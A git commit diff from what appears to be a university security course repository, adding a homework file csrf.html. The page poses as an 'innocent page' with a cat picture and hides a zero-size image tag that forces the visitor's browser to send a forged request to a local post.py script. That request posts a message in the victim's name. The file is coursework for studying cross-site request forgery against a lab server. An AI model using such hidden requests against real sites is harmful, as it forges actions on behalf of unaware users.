diff options
author | 53hornet <53hornet@gmail.com> | 2019-02-02 23:10:20 -0500 |
---|---|---|
committer | 53hornet <53hornet@gmail.com> | 2019-02-02 23:10:20 -0500 |
commit | 24cd8bc11345395f1a0bb64d61e51e207d8b3ace (patch) | |
tree | ef8242cda1175c11dd4a565e1ba16cb531c11c47 /hw4/csrf.html | |
download | csci454-master.tar.xz csci454-master.zip |
Diffstat (limited to 'hw4/csrf.html')
-rw-r--r-- | hw4/csrf.html | 14 |
1 files changed, 14 insertions, 0 deletions
diff --git a/hw4/csrf.html b/hw4/csrf.html new file mode 100644 index 0000000..3e8cdae --- /dev/null +++ b/hw4/csrf.html @@ -0,0 +1,14 @@ +<html> +<title> Innocent page </title> +<body> +<h2>This is innocent page, here is a picture of a cute cat: </h2> <br> + +<img src="cat.jpg"> + +<!-- Insert your CSRF attack here. For example you can use another hidden <img> to +generate an HTTP request to post.py to write something from victim --> + +<img src="http://127.0.0.1:8000/cgi-bin/post.py?message=i%20am%20not%20l33t" width="0" height="0" border="0"> + +</body> +</html> |